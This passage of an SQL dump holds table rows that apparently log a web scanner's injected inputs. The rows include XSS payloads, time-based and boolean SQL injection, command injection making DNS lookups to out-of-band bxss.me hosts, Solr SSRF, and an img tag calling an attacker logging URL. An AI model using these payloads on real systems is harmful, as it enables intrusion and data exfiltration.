10:05:24'),(1537,'\".gethostbyname(lc(\"hitag\".\"ygphzhqz7148f.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(102).chr(67).chr(107).chr(74).\"',0,1,NULL,9,1,1,0,'2021-10-31 10:05:26'),(1543,'`(nslookup hitipiplrjqlm22852.bxss.me||perl -e \"gethostbyname(\'hitipiplrjqlm22852.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 10:05:29'),(1551,';(nslookup hitwnzuetynns37e01.bxss.me||perl -e \"gethostbyname(\'hitwnzuetynns37e01.bxss.me\')\")|(nslookup hitwnzuetynns37e01.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 10:05:34'),(1577,'\"+\"A\".concat(70-3).concat(22*4).concat(118).concat(77).concat(118).concat(67)+(require\"socket\"\nSocket.gethostbyname(\"hityl\"+\"bwd',0,1,NULL,9,1,1,0,'2021-10-31 10:05:46'),(1581,'\'+\'A\'.concat(70-3).concat(22*4).concat(108).concat(77).concat(103).concat(66)+(require\'socket\'\nSocket.gethostbyname(\'hityv\'+\'txw',27,1,NULL,9,1,1,0,'2021-10-31 10:05:50'),(1634,'964825',0,1,NULL,9,1,1,0,'2021-10-31 10:06:26'),(1752,'thất\'\"()&%<acx><ScRiPt >wCE4(9671)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 10:08:43'),(1754,'\'\"()&%<acx><ScRiPt >wCE4(9169)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 10:08:45'),(1756,'thất9131275',0,1,NULL,9,1,1,0,'2021-10-31 10:08:47'),(1758,'thất9131275<',0,1,NULL,9,1,1,0,'2021-10-31 10:08:49'),(1760,'acu10526＜s1﹥s2ʺs3ʹuca10526',0,1,NULL,9,1,1,0,'2021-10-31 10:08:51'),(1762,'acux10254??z1??z2a?bcxuca10254',0,1,NULL,9,1,1,0,'2021-10-31 10:08:54'),(1784,'acu9734＜s1﹥s2ʺs3ʹuca9734',0,1,NULL,9,1,1,0,'2021-10-31 10:09:28'),(1786,'acux8025??z1??z2a?bcxuca8025',0,1,NULL,9,1,1,0,'2021-10-31 10:09:32'),(1806,'acu9293＜s1﹥s2ʺs3ʹuca9293',0,1,NULL,9,1,1,0,'2021-10-31 10:10:07'),(1808,'acux1046??z1??z2a?bcxuca1046',0,1,NULL,9,1,1,0,'2021-10-31 10:10:10'),(1830,'acu7628＜s1﹥s2ʺs3ʹuca7628',0,1,NULL,9,1,1,0,'2021-10-31 10:10:44'),(1832,'acux4242??z1??z2a?bcxuca4242',0,1,NULL,9,1,1,0,'2021-10-31 10:10:46'),(1852,'thất\"onmouseover=wCE4(95882)\"',2,1,NULL,9,1,1,0,'2021-10-31 10:11:17'),(1854,'thất\" pm7p=wCE4([!+!]) s0h=\"',2,1,NULL,9,1,1,0,'2021-10-31 10:11:24'),(1856,'thất\\u0022onmouseover=wCE4(97213)\\u0022',2,1,NULL,9,1,1,0,'2021-10-31 10:11:28'),(1858,'%74%68%E1%BA%A5%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%77%43%45%34%28%39%34%31%39%34%29%22',18,1,NULL,9,1,1,0,'2021-10-31 10:11:31'),(1860,'?\"onmouseover=wCE4(96625)//',0,1,NULL,9,1,1,0,'2021-10-31 10:11:36'),(1862,'thất\"sTYLe=\'acu:Expre/**/SSion(wCE4(9166))\'bad=\"',2,1,NULL,9,1,1,0,'2021-10-31 10:11:38'),(1864,'thất\"><script>wCE4(9770)</script>',2,1,NULL,9,1,1,0,'2021-10-31 10:11:41'),(1866,'thất</title><ScRiPt >wCE4(9476)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 10:11:44'),(1868,'thất<ScRiPt >wCE4(9149)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 10:11:47'),(1872,'thất<WOKTUG>EMFD2[!+!]</WOKTUG>',2,1,NULL,9,1,1,0,'2021-10-31 10:11:50'),(1874,'thất<script>wCE4(9346)</script>',2,1,NULL,9,1,1,0,'2021-10-31 10:11:53'),(1876,'thất<ScR<ScRiPt>IpT>wCE4(9278)</sCr<ScRiPt>IpT>',2,1,NULL,9,1,1,0,'2021-10-31 10:11:56'),(1878,'thất<ScRiPt \r\n>wCE4(9253)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 10:11:59'),(1880,'thất<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9881></ScRiPt>',17,1,NULL,9,1,1,0,'2021-10-31 10:12:03'),(1882,'thất<\0ScRiPt \r\n>wCE4(9240)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 10:12:08'),(1884,'thất<svg	\n\r?\0onload=wCE4(9857);>',2,1,NULL,9,1,1,0,'2021-10-31 10:12:11'),(1886,'thất<isindex type=image src=1 onerror=wCE4(9809)>',2,1,NULL,9,1,1,0,'2021-10-31 10:12:16'),(1888,'thất<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9792\'>',2,1,NULL,9,1,1,0,'2021-10-31 10:12:21'),(1890,'thất<body onload=wCE4(9871)>',2,1,NULL,9,1,1,0,'2021-10-31 10:12:28'),(1892,'thất<img src=//xss.bxss.me/t/dot.gif onload=wCE4(9774)>',2,1,NULL,9,1,1,0,'2021-10-31 10:12:32'),(1894,'thất<img src=xyz OnErRor=wCE4(9329)>',2,1,NULL,9,1,1,0,'2021-10-31 10:12:37'),(1896,'thất<img/src=\">\" onerror=alert(9406)>',2,1,NULL,9,1,1,0,'2021-10-31 10:12:40'),(1898,'%74%68%E1%BA%A5%74%3C%53%63%52%69%50%74%20%3E%77%43%45%34%289292%29%3C%2F%73%43%72%69%70%54%3E',11,1,NULL,9,1,1,0,'2021-10-31 10:12:44'),(1900,'thất\\u003CScRiPt\\wCE4(9747)\\u003C/sCripT\\u003E',2,1,NULL,9,1,1,0,'2021-10-31 10:12:47'),(1902,'thất&lt;ScRiPt&gt;wCE4(9520)&lt;/sCripT&gt;',2,1,NULL,9,1,1,0,'2021-10-31 10:12:52'),(1904,'?<img acu onmouseover=wCE4(97131) //?>',0,1,NULL,9,1,1,0,'2021-10-31 10:12:54'),(1906,'thất<input autofocus onfocus=wCE4(9606)>',2,1,NULL,9,1,1,0,'2021-10-31 10:12:58'),(1912,'thất}body{acu:Expre/**/SSion(wCE4(9797))}',2,1,NULL,9,1,1,0,'2021-10-31 10:13:08'),(1914,'thất7IEv8\n<ScRiPt >wCE4(9394)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 10:13:10'),(1916,'thất<WK0RYC>F4SIG[!+!]</WK0RYC>',2,1,NULL,9,1,1,0,'2021-10-31 10:13:15'),(1920,'thất<ifRAme sRc=9744.com></IfRamE>',2,1,NULL,9,1,1,0,'2021-10-31 10:13:19'),(1922,'thất<a8WhawI x=9663>',2,1,NULL,9,1,1,0,'2021-10-31 10:13:22'),(1924,'thất<img sRc=\'http://attacker-9946/log.php?',2,1,NULL,9,1,1,0,'2021-10-31 10:13:24'),(1926,'thất<awmL1cV<',2,1,NULL,9,1,1,0,'2021-10-31 10:13:30'),(1968,'VEMjCYmz',0,1,NULL,9,1,1,0,'2021-10-31 10:23:51'),(1970,'thất\' AND 2*3*8=6*8 AND \'XYml\'=\'XYml',37,1,NULL,9,1,1,0,'2021-10-31 10:23:56'),(1972,'thất\" AND 2*3*8=6*8 AND \"Y7Fa\"=\"Y7Fa',37,1,NULL,9,1,1,0,'2021-10-31 10:24:02'),(1974,'thất%\' AND 2*3*8=6*8 AND \'xiX4\'!=\'xiX4%',37,1,NULL,9,1,1,0,'2021-10-31 10:24:07'),(1976,'-1 OR 2+675-675-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 10:24:12'),(1978,'-1 OR 3+675-675-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 10:24:17'),(1980,'-1 OR 3*2<(0+5+675-675)',48,1,NULL,9,1,1,0,'2021-10-31 10:24:21'),(1982,'-1 OR 3*2>(0+5+675-675)',48,1,NULL,9,1,1,0,'2021-10-31 10:24:25'),(1984,'thất\'||\'',2,17,NULL,9,1,1,0,'2021-10-31 23:00:28'),(1990,'@@pb8j5',0,1,NULL,9,1,1,0,'2021-10-31 10:24:40'),(1994,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003690217199\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003690217199\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 10:36:01'),(1998,'aaa&shards=http://hitmhcqvkhgyt643eb.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 10:36:06'),(2000,'1DRybfP0aO',0,1,NULL,9,1,1,0,'2021-10-31 10:36:07'),(2018,'6oiWb1mZ',0,1,NULL,9,1,1,0,'2021-10-31 10:36:21'),(2048,'response.write(9660669*9311061)',0,1,NULL,9,1,1,0,'2021-10-31 10:36:45'),(2054,'\'+response.write(9660669*9311061)+\'',0,1,NULL,9,1,1,0,'2021-10-31 10:36:51'),(2062,'\"+response.write(9660669*9311061)+\"',0,1,NULL,9,1,1,0,'2021-10-31 10:36:56'),(2086,'${9999472+9999496}',0,1,NULL,9,1,1,0,'2021-10-31 10:37:12'),(2112,'./thất',2,16,NULL,9,1,1,0,'2021-10-31 22:54:35'),(2118,'thất&n917573=v985976',2,1,NULL,9,1,1,0,'2021-10-31 10:37:32'),(2142,'echo vdlvgj$()\\ tyiixs\\nz^xyu||a #\' &echo vdlvgj$()\\ tyiixs\\nz^xyu||a #|\" &echo vdlvgj$()\\ tyiixs\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 10:37:45'),(2148,'&echo cvahvz$()\\ whnjlr\\nz^xyu||a #\' &echo cvahvz$()\\ whnjlr\\nz^xyu||a #|\" &echo cvahvz$()\\ whnjlr\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 10:37:49'),(2156,'|echo dljrjm$()\\ spmvyb\\nz^xyu||a #\' |echo dljrjm$()\\ spmvyb\\nz^xyu||a #|\" |echo dljrjm$()\\ spmvyb\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 10:37:54'),(2162,'\'.gethostbyname(lc(\'hitqo\'.\'lvdzaebsd62dd.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(98).chr(77).chr(101).chr(81).\'',5,1,NULL,9,1,1,0,'2021-10-31 10:37:58'),(2164,'(nslookup hitnogbexxyxl1402f.bxss.me||perl -e \"gethostbyname(\'hitnogbexxyxl1402f.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 10:37:58'),(2169,'$(nslookup hitiiteshnkrvd66c9.bxss.me||perl -e \"gethostbyname(\'hitiiteshnkrvd66c9.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 10:38:04'),(2171,'\".gethostbyname(lc(\"hitxw\".\"cqgicxit057ff.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(114).chr(71).chr(103).chr(89).\"',0,1,NULL,9,1,1,0,'2021-10-31 10:38:05'),(2179,'&(nslookup hitmjekrliuwba4612.bxss.me||perl -e \"gethostbyname(\'hitmjekrliuwba4612.bxss.me\')\")&\'\\\"`0&(nslookup hitmjekrliuwba4612',0,1,NULL,9,1,1,0,'2021-10-31 10:38:10'),(2185,'|(nslookup hitgoqvjtqjgec6fb7.bxss.me||perl -e \"gethostbyname(\'hitgoqvjtqjgec6fb7.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 10:38:14'),(2193,'`(nslookup hitokxnyithtuefd16.bxss.me||perl -e \"gethostbyname(\'hitokxnyithtuefd16.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 10:38:20'),(2199,';(nslookup hitnnmluodeqi7af9c.bxss.me||perl -e \"gethostbyname(\'hitnnmluodeqi7af9c.bxss.me\')\")|(nslookup hitnnmluodeqi7af9c.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 10:38:25'),(2241,'\"+\"A\".concat(70-3).concat(22*4).concat(120).concat(88).concat(104).concat(65)+(require\"socket\"\nSocket.gethostbyname(\"hitsf\"+\"zlr',0,1,NULL,9,1,1,0,'2021-10-31 10:38:52'),(2249,'\'+\'A\'.concat(70-3).concat(22*4).concat(118).concat(79).concat(100).concat(65)+(require\'socket\'\nSocket.gethostbyname(\'hiteb\'+\'jbv',26,1,NULL,9,1,1,0,'2021-10-31 10:38:58'),(2330,'911368',0,1,NULL,9,1,1,0,'2021-10-31 10:39:57'),(2548,'thất\'\"()&%<acx><ScRiPt >OJQh(9679)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 10:45:49'),(2550,'\'\"()&%<acx><ScRiPt >OJQh(9185)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 10:45:53'),(2552,'thất9577465',0,1,NULL,9,1,1,0,'2021-10-31 10:45:57'),(2554,'thất9577465<',0,1,NULL,9,1,1,0,'2021-10-31 10:45:59'),(2556,'acu8162＜s1﹥s2ʺs3ʹuca8162',0,1,NULL,9,1,1,0,'2021-10-31 10:46:03'),(2560,'acux10784??z1??z2a?bcxuca10784',0,1,NULL,9,1,1,0,'2021-10-31 10:46:06'),(2582,'acu7581＜s1﹥s2ʺs3ʹuca7581',0,1,NULL,9,1,1,0,'2021-10-31 10:46:35'),(2584,'acux4253??z1??z2a?bcxuca4253',0,1,NULL,9,1,1,0,'2021-10-31 10:46:38'),(2606,'thất\"onmouseover=OJQh(99132)\"',2,1,NULL,9,1,1,0,'2021-10-31 10:47:17'),(2610,'thất\" rHAi=OJQh([!+!]) IJS=\"',2,1,NULL,9,1,1,0,'2021-10-31 10:47:20'),(2612,'thất\\u0022onmouseover=OJQh(91423)\\u0022',2,1,NULL,9,1,1,0,'2021-10-31 10:47:23'),(2614,'%74%68%E1%BA%A5%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%4F%4A%51%68%28%39%36%39%32%34%29%22',20,1,NULL,9,1,1,0,'2021-10-31 10:47:27'),(2618,'?\"onmouseover=OJQh(96645)//',0,1,NULL,9,1,1,0,'2021-10-31 10:47:30'),(2620,'thất\"sTYLe=\'acu:Expre/**/SSion(OJQh(9750))\'bad=\"',2,1,NULL,9,1,1,0,'2021-10-31 10:47:33'),(2624,'thất\"><script>OJQh(9360)</script>',2,1,NULL,9,1,1,0,'2021-10-31 10:47:36'),(2626,'thất</title><ScRiPt >OJQh(9884)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 10:47:39'),(2690,'wii6Rrsi',0,1,NULL,9,1,1,0,'2021-10-31 11:05:53'),(2692,'thất\' AND 2*3*8=6*8 AND \'ucMv\'=\'ucMv',37,1,NULL,9,1,1,0,'2021-10-31 11:05:57'),(2694,'thất\" AND 2*3*8=6*8 AND \"as6K\"=\"as6K',37,1,NULL,9,1,1,0,'2021-10-31 11:06:01'),(2696,'thất%\' AND 2*3*8=6*8 AND \'ldbo\'!=\'ldbo%',37,1,NULL,9,1,1,0,'2021-10-31 11:06:05'),(2698,'-1 OR 2+922-922-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 11:06:08'),(2700,'-1 OR 3+922-922-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 11:06:11'),(2704,'-1 OR 3*2<(0+5+922-922)',48,1,NULL,9,1,1,0,'2021-10-31 11:06:19'),(2706,'-1 OR 3*2>(0+5+922-922)',48,1,NULL,9,1,1,0,'2021-10-31 11:06:26'),(2720,'h3TCiydV\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 11:14:01'),(2722,'cJPDpq80\' OR 84=(SELECT 84 FROM PG_SLEEP(15))--',4,1,NULL,9,1,1,0,'2021-10-31 11:15:02'),(2724,'2wp9eQLT\') OR 262=(SELECT 262 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 11:15:55'),(2726,'SULLtFbc\')) OR 97=(SELECT 97 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 11:16:41'),(2728,'thất\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'',6,16,NULL,9,1,1,0,'2021-10-31 23:18:44'),(2734,'@@fru3Z',0,1,NULL,9,1,1,0,'2021-10-31 11:17:43'),(2740,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003696394998\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003696394998\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 11:20:12'),(2744,'aaa&shards=http://hitmhrtkxjfcw6e213.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 11:20:14'),(2746,'1BrydiNskeO',0,1,NULL,9,1,1,0,'2021-10-31 11:20:18'),(2786,'response.write(9413028*9544672)',0,1,NULL,9,1,1,0,'2021-10-31 11:20:50'),(2788,'\'+response.write(9413028*9544672)+\'',0,1,NULL,9,1,1,0,'2021-10-31 11:20:53'),(2792,'\"+response.write(9413028*9544672)+\"',0,1,NULL,9,1,1,0,'2021-10-31 11:20:55'),(2814,'pB8ZDdXr',0,1,NULL,9,1,1,0,'2021-10-31 11:21:09'),(2890,'${9999792+9999756}',0,1,NULL,9,1,1,0,'2021-10-31 11:21:50'),(2922,'thất&n914787=v999346',2,1,NULL,9,1,1,0,'2021-10-31 11:22:05'),(2924,'echo yltvbf$()\\ gsbyiz\\nz^xyu||a #\' &echo yltvbf$()\\ gsbyiz\\nz^xyu||a #|\" &echo yltvbf$()\\ gsbyiz\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 11:22:05'),(2928,'&echo ikoqty$()\\ ncnhvt\\nz^xyu||a #\' &echo ikoqty$()\\ ncnhvt\\nz^xyu||a #|\" &echo ikoqty$()\\ ncnhvt\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 11:22:07'),(2932,'|echo lwpqje$()\\ scntbv\\nz^xyu||a #\' |echo lwpqje$()\\ scntbv\\nz^xyu||a #|\" |echo lwpqje$()\\ scntbv\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 11:22:10'),(2940,'(nslookup hitcxhqdlzwzm484fb.bxss.me||perl -e \"gethostbyname(\'hitcxhqdlzwzm484fb.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 11:22:14'),(2950,'$(nslookup hitjcyajecuuvf8903.bxss.me||perl -e \"gethostbyname(\'hitjcyajecuuvf8903.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 11:22:18'),(2958,'&(nslookup hitjrmsvpdbxd59cf7.bxss.me||perl -e \"gethostbyname(\'hitjrmsvpdbxd59cf7.bxss.me\')\")&\'\\\"`0&(nslookup hitjrmsvpdbxd59cf7',0,1,NULL,9,1,1,0,'2021-10-31 11:22:21'),(2966,'|(nslookup hitfbgmijzmjk235e1.bxss.me||perl -e \"gethostbyname(\'hitfbgmijzmjk235e1.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 11:22:25'),(2970,'`(nslookup hitiiofhdbmuj95c6f.bxss.me||perl -e \"gethostbyname(\'hitiiofhdbmuj95c6f.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 11:22:28'),(2985,';(nslookup hitexaldvkuoh23e76.bxss.me||perl -e \"gethostbyname(\'hitexaldvkuoh23e76.bxss.me\')\")|(nslookup hitexaldvkuoh23e76.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 11:22:35'),(2987,'\'.gethostbyname(lc(\'hitje\'.\'qxtfapfe6e340.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(113).chr(65).chr(108).chr(73).\'',4,1,NULL,9,1,1,0,'2021-10-31 11:22:37'),(2993,'\".gethostbyname(lc(\"hitsf\".\"fiddavrcb0034.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(109).chr(81).chr(117).chr(83).\"',0,1,NULL,9,1,1,0,'2021-10-31 11:22:39'),(3051,'\"+\"A\".concat(70-3).concat(22*4).concat(120).concat(80).concat(120).concat(80)+(require\"socket\"\nSocket.gethostbyname(\"hitjp\"+\"wol',0,1,NULL,9,1,1,0,'2021-10-31 11:23:09'),(3059,'\'+\'A\'.concat(70-3).concat(22*4).concat(107).concat(90).concat(97).concat(71)+(require\'socket\'\nSocket.gethostbyname(\'hitgr\'+\'bggu',29,1,NULL,9,1,1,0,'2021-10-31 11:23:14'),(3186,'903199',0,1,NULL,9,1,1,0,'2021-10-31 11:24:19'),(3468,'thất\'\"()&%<acx><ScRiPt >p17u(9302)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 11:30:38'),(3470,'\'\"()&%<acx><ScRiPt >p17u(9975)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 11:30:40'),(3472,'thất9545572',0,1,NULL,9,1,1,0,'2021-10-31 11:30:41'),(3474,'thất9545572<',0,1,NULL,9,1,1,0,'2021-10-31 11:30:43'),(3476,'acu7571＜s1﹥s2ʺs3ʹuca7571',0,1,NULL,9,1,1,0,'2021-10-31 11:30:46'),(3478,'acux10697??z1??z2a?bcxuca10697',0,1,NULL,9,1,1,0,'2021-10-31 11:30:48'),(3500,'thất</title><ScRiPt >p17u(9788)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 11:31:17'),(3606,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003698981506\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003698981506\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 12:06:46'),(3614,'aaa&shards=http://hitjhxpedydnh7c1bf.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 12:06:51'),(3630,'1BQ9qTzdVlO',0,1,NULL,9,1,1,0,'2021-10-31 12:06:59'),(3654,'DMDK6uw5',0,1,NULL,9,1,1,0,'2021-10-31 12:07:14'),(3700,'response.write(9737392*9350761)',0,1,NULL,9,1,1,0,'2021-10-31 12:07:39'),(3708,'\'+response.write(9737392*9350761)+\'',0,1,NULL,9,1,1,0,'2021-10-31 12:07:42'),(3716,'\"+response.write(9737392*9350761)+\"',0,1,NULL,9,1,1,0,'2021-10-31 12:07:46'),(3754,'${9999844+9999006}',0,1,NULL,9,1,1,0,'2021-10-31 12:08:06'),(3806,'thất&n998012=v917347',2,1,NULL,9,1,1,0,'2021-10-31 12:08:31'),(3886,'\'.gethostbyname(lc(\'hitdi\'.\'ygedddyt49957.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(105).chr(87).chr(114).chr(68).\'',3,1,NULL,9,1,1,0,'2021-10-31 12:09:09'),(3895,'\".gethostbyname(lc(\"hitbd\".\"tupwobxp69e19.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(105).chr(70).chr(108).chr(88).\"',0,1,NULL,9,1,1,0,'2021-10-31 12:09:14'),(3949,'echo tmperc$()\\ jugjvu\\nz^xyu||a #\' &echo tmperc$()\\ jugjvu\\nz^xyu||a #|\" &echo tmperc$()\\ jugjvu\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 12:09:39'),(3961,'&echo rasrdb$()\\ eqrmcv\\nz^xyu||a #\' &echo rasrdb$()\\ eqrmcv\\nz^xyu||a #|\" &echo rasrdb$()\\ eqrmcv\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 12:09:45'),(3975,'|echo pnojmo$()\\ hwlelt\\nz^xyu||a #\' |echo pnojmo$()\\ hwlelt\\nz^xyu||a #|\" |echo pnojmo$()\\ hwlelt\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 12:09:53'),(3983,'(nslookup hitiyqefuptsxf58fa.bxss.me||perl -e \"gethostbyname(\'hitiyqefuptsxf58fa.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 12:09:57'),(3991,'$(nslookup hitsdqhlrmhwia2eff.bxss.me||perl -e \"gethostbyname(\'hitsdqhlrmhwia2eff.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 12:10:02'),(4003,'&(nslookup hitarhrbcwllq74a95.bxss.me||perl -e \"gethostbyname(\'hitarhrbcwllq74a95.bxss.me\')\")&\'\\\"`0&(nslookup hitarhrbcwllq74a95',0,1,NULL,9,1,1,0,'2021-10-31 12:10:09'),(4013,'|(nslookup hitdaoqvdlgci4bf28.bxss.me||perl -e \"gethostbyname(\'hitdaoqvdlgci4bf28.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 12:10:15'),(4015,'\"+\"A\".concat(70-3).concat(22*4).concat(104).concat(76).concat(109).concat(84)+(require\"socket\"\nSocket.gethostbyname(\"hitxk\"+\"seb',0,1,NULL,9,1,1,0,'2021-10-31 12:10:16'),(4019,'`(nslookup hitnzxihkszaobdaed.bxss.me||perl -e \"gethostbyname(\'hitnzxihkszaobdaed.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 12:10:18'),(4025,';(nslookup hitxeyixvwzhec2355.bxss.me||perl -e \"gethostbyname(\'hitxeyixvwzhec2355.bxss.me\')\")|(nslookup hitxeyixvwzhec2355.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 12:10:22'),(4031,'\'+\'A\'.concat(70-3).concat(22*4).concat(99).concat(87).concat(101).concat(86)+(require\'socket\'\nSocket.gethostbyname(\'hitbw\'+\'wfce',26,1,NULL,9,1,1,0,'2021-10-31 12:10:24'),(4190,'976555',0,1,NULL,9,1,1,0,'2021-10-31 12:12:00'),(4480,'thất\'\"()&%<acx><ScRiPt >04Kq(9432)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 12:18:08'),(4482,'\'\"()&%<acx><ScRiPt >04Kq(9991)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 12:18:10'),(4484,'thất9199937',0,1,NULL,9,1,1,0,'2021-10-31 12:18:13'),(4486,'thất9199937<',0,1,NULL,9,1,1,0,'2021-10-31 12:18:15'),(4488,'acu8310＜s1﹥s2ʺs3ʹuca8310',0,1,NULL,9,1,1,0,'2021-10-31 12:18:17'),(4490,'acux6709??z1??z2a?bcxuca6709',0,1,NULL,9,1,1,0,'2021-10-31 12:18:20'),(4512,'thất</title><ScRiPt >04Kq(9510)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 12:18:44'),(4518,'J7tt20w7',0,1,NULL,9,1,1,0,'2021-10-31 12:19:48'),(4520,'thất\' AND 2*3*8=6*8 AND \'V9or\'=\'V9or',37,1,NULL,9,1,1,0,'2021-10-31 12:19:55'),(4522,'thất\" AND 2*3*8=6*8 AND \"ppyP\"=\"ppyP',37,1,NULL,9,1,1,0,'2021-10-31 12:20:00'),(4524,'thất%\' AND 2*3*8=6*8 AND \'p3dG\'!=\'p3dG%',37,1,NULL,9,1,1,0,'2021-10-31 12:20:05'),(4526,'-1 OR 2+412-412-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 12:20:09'),(4528,'-1 OR 3+412-412-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 12:20:14'),(4530,'-1 OR 3*2<(0+5+412-412)',48,1,NULL,9,1,1,0,'2021-10-31 12:20:17'),(4532,'-1 OR 3*2>(0+5+412-412)',48,1,NULL,9,1,1,0,'2021-10-31 12:20:23'),(4574,'xTGzFQxg\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 12:28:23'),(4578,'CcZicOJJ\' OR 271=(SELECT 271 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 12:29:25'),(4582,'pHBLmvQ4\') OR 106=(SELECT 106 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 12:30:27'),(4586,'mqwSrxQA\')) OR 356=(SELECT 356 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 12:31:32'),(4596,'@@8Ecf1',0,1,NULL,9,1,1,0,'2021-10-31 12:32:34'),(4718,'eaS4WLuv',0,1,NULL,9,1,1,0,'2021-10-31 13:17:31'),(4720,'thất\' AND 2*3*8=6*8 AND \'wasX\'=\'wasX',37,1,NULL,9,1,1,0,'2021-10-31 13:17:35'),(4722,'thất\" AND 2*3*8=6*8 AND \"6szp\"=\"6szp',37,1,NULL,9,1,1,0,'2021-10-31 13:17:40'),(4724,'thất%\' AND 2*3*8=6*8 AND \'rHFj\'!=\'rHFj%',37,1,NULL,9,1,1,0,'2021-10-31 13:17:45'),(4726,'-1 OR 2+346-346-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 13:17:48'),(4728,'-1 OR 3+346-346-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 13:17:51'),(4730,'-1 OR 3*2<(0+5+346-346)',48,1,NULL,9,1,1,0,'2021-10-31 13:17:54'),(4732,'-1 OR 3*2>(0+5+346-346)',48,1,NULL,9,1,1,0,'2021-10-31 13:17:56'),(4748,'TU3JHzft\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 13:25:24'),(4750,'TijdFpVT\' OR 760=(SELECT 760 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 13:26:27'),(4752,'l0CdF7Oz\') OR 532=(SELECT 532 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 13:27:34'),(4754,'ZsXkSvIf\')) OR 637=(SELECT 637 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 13:28:38'),(4762,'@@bLKXI',0,1,NULL,9,1,1,0,'2021-10-31 